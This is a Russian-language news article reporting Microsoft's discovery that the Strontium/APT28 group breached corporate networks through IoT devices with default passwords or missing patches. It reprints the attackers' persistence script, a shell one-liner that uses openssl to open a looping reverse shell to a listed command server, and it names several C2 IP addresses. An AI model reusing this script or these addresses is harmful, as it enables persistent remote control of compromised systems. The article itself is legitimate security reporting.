Microsoft рассказала об атаках русских хакеров на корпоративные сети через устройства «интернета вещей» Материал редакции

Целью стали VOIP-телефоны, офисные принтеры и видеодекодеры.

В закладки
Аудио

Специалисты Центра анализа угроз Microsoft обнаружили атаки на корпоративные сети через устройства «интернета вещей» со стороны группировки Strontium. В некоторых случаях хакерам даже не приходилось ничего взламывать: достаточно было ввести заводские пароли.

В Microsoft обнаружили как минимум три случая подобных атак. Злоумышленники пытались получить доступ к внутренней сети через VOIP-телефон, офисный принтер и видеодекодер. В двух случаях оказалось достаточно ввести заводской пароль, а на третьем устройстве не было установлено последнее обновление безопасности.

Устройства использовали в качестве точки входа. Через них хакеры проникли в сеть и начали сканировать её в поиске других незащищённых устройств с учётными записями с высокими привилегиями.

После получения доступа к каждому из устройств злоумышленники устанавливали скрипт для сниффинга (перехвата) трафика в локальной сети. При перемещении между устройствами хакеры также внедряли скрипт для укоренения в системе.

—contents of [IOT Device] file--

#!/bin/sh

export [IOT Device] ="-qws -display :1 -nomouse"

echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host

167.114.153.55 -port 443 |while : ; do sh && break; done| openssl

s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 &&

cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ];

then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&' &

--end contents of file--

скрипт для поддержания присутствия хакеров в сети

В Microsoft выяснили, что злоумышленники управляли устройствами с помощью удалённого сервера с IP-адресов 167.114.153.55, 94.237.37.28, 82.118.242.171, 31.220.61.251 и 128.199.199.187. Специалисты считают, что хакеры связаны с группировкой Strontium («Стронций»), также известной как Fancy Bear и APT28.

Эксперты по кибербезопасности и СМИ утверждают, что Fancy Bear связана с российским правительством. Группировке приписывают взлом демпартии США в 2016 году, попытки взломать американских чиновников и помешать европейским выборам в 2019 году.

Так как атаки на устройства «интернета вещей» Microsoft заметила на ранних стадиях, специалисты не установили конечную цель хакеров. Как отметили в компании, только за последние 12 месяцев сотрудники разослали 1400 уведомлений об атаках Strontium по всему миру. Большая часть целей относилась в государственной, IT, военной, оборонной, медицинской, образовательной и инженерной областям.

{ "author_name": "Дамир Камалетдинов", "author_type": "editor", "tags": ["\u0445\u0430\u043a\u0435\u0440\u044b","\u043d\u043e\u0432\u043e\u0441\u0442\u0438","\u0430\u0442\u0430\u043a\u0438","microsoft"], "comments": 10, "likes": 19, "favorites": 2, "is_advertisement": false, "subsite_label": "news", "id": 110066, "is_wide": false, "is_ugc": false, "date": "Tue, 06 Aug 2019 20:17:37 +0300", "is_special": false }
Новости
дискуссии в сообществе доступны только владельцам клубного аккаунта
С клубным аккаунтом вы сможете
создавать записи и вести дискуссии в закрытых сообществах
наслаждаться нашим сайтом без рекламы
помочь проекту и почувствовать себя лучше
Купить за 75₽
Обсуждаемое
Разборы
Нехватка местных новостей, закрытие телеканалов и уход в интернет: чем переход на цифровое ТВ грозит регионам
Масштабная правительственная программа оборачивается серьёзным кризисом для жителей дальних точек России.
Новости
Институт развития интернета предложил включить в школьную программу занятия по Dota 2, Hearthstone и World of Tanks
Последняя игра, по мнению организации, развивает скорость реакции и стратегическое мышление.
Технологии
Google избавилась от «сладких» приставок Android. Новую версию назвали Android 10
Система получила числовую приставку впервые с первых версий.

Прямой эфир

[ { "id": 1, "label": "100%×150_Branding_desktop", "provider": "adfox", "adaptive": [ "desktop" ], "adfox_method": "createAdaptive", "auto_reload": true, "adfox": { "ownerId": 228129, "params": { "pp": "g", "ps": "cndo", "p2": "ezfl" } } }, { "id": 2, "label": "1200х400", "provider": "adfox", "adaptive": [ "phone" ], "auto_reload": true, "adfox": { "ownerId": 228129, "params": { "pp": "g", "ps": "cndo", "p2": "ezfn" } } }, { "id": 3, "label": "240х200 _ТГБ_desktop", "provider": "adfox", "adaptive": [ "desktop" ], "adfox": { "ownerId": 228129, "params": { "pp": "i", "ps": "cndo", "p2": "fizc" } } }, { "id": 4, "label": "Article Branding", "provider": "adfox", "adaptive": [ "desktop" ], "adfox": { "ownerId": 228129, "params": { "p1": "cfovy", "p2": "glug" } } }, { "id": 5, "label": "300x500_desktop", "provider": "adfox", "adaptive": [ "desktop" ], "adfox": { "ownerId": 228129, "params": { "pp": "g", "ps": "cndo", "p2": "ezfk" } } }, { "id": 6, "disable": true, "label": "1180х250_Interpool_баннер над комментариями_Desktop", "provider": "adfox", "adaptive": [ "desktop" ], "adfox": { "ownerId": 228129, "params": { "pp": "h", "ps": "clmf", "p2": "ffyh" } } }, { "id": 7, "label": "Article Footer 100%_desktop_mobile", "provider": "adfox", "adaptive": [ "desktop", "tablet", "phone" ], "adfox": { "ownerId": 228129, "params": { "p1": "byswn", "p2": "fjxb" } } }, { "id": 8, "label": "Fullscreen Desktop", "provider": "adfox", "adaptive": [ "desktop", "tablet" ], "auto_reload": true, "adfox": { "ownerId": 228129, "params": { "pp": "g", "ps": "cndo", "p2": "fjoh" } } }, { "id": 9, "label": "Fullscreen Mobile", "provider": "adfox", "adaptive": [ "phone" ], "auto_reload": true, "adfox": { "ownerId": 228129, "params": { "pp": "g", "ps": "cndo", "p2": "fjog" } } }, { "id": 10, "disable": true, "label": "Native Partner Desktop", "provider": "adfox", "adaptive": [ "desktop", "tablet" ], "adfox": { "ownerId": 228129, "params": { "pp": "g", "ps": "clmf", "p2": "fmyb" } } }, { "id": 11, "disable": true, "label": "Native Partner Mobile", "provider": "adfox", "adaptive": [ "phone" ], "adfox": { "ownerId": 228129, "params": { "pp": "g", "ps": "clmf", "p2": "fmyc" } } }, { "id": 12, "label": "Кнопка в шапке", "provider": "adfox", "adaptive": [ "desktop", "tablet" ], "auto_reload": true, "adfox": { "ownerId": 228129, "params": { "pp": "g", "ps": "cndo", "p2": "fdhx" } } }, { "id": 13, "label": "DM InPage Video PartnerCode", "provider": "adfox", "adaptive": [ "desktop", "tablet", "phone" ], "adfox_method": "createAdaptive", "adfox": { "ownerId": 228129, "params": { "pp": "h", "ps": "cndo", "p2": "flvn" } } }, { "id": 14, "label": "Yandex context video banner", "provider": "yandex", "yandex": { "block_id": "VI-223677-0", "render_to": "inpage_VI-223677-0-130073047", "adfox_url": "//ads.adfox.ru/228129/getCode?pp=h&ps=cndo&p2=fpjw&puid1=&puid2=&puid3=&puid4=&puid8=&puid9=&puid10=&puid21=&puid22=&puid31=&puid32=&puid33=&fmt=1&dl={REFERER}&pr=" } }, { "id": 15, "label": "Баннер в ленте на главной", "provider": "adfox", "adaptive": [ "desktop", "tablet", "phone" ], "adfox": { "ownerId": 228129, "params": { "p1": "byudv", "p2": "ftjf" } } }, { "id": 16, "label": "Кнопка в шапке мобайл", "provider": "adfox", "adaptive": [ "tablet", "phone" ], "adfox": { "ownerId": 228129, "params": { "p1": "ccydt", "p2": "ftwx" } } }, { "id": 17, "label": "Stratum Desktop", "provider": "adfox", "adaptive": [ "desktop" ], "auto_reload": true, "adfox": { "ownerId": 228129, "params": { "pp": "g", "ps": "cndo", "p2": "fzvb" } } }, { "id": 18, "label": "Stratum Mobile", "provider": "adfox", "adaptive": [ "tablet", "phone" ], "auto_reload": true, "adfox": { "ownerId": 228129, "params": { "pp": "g", "ps": "cndo", "p2": "fzvc" } } } ]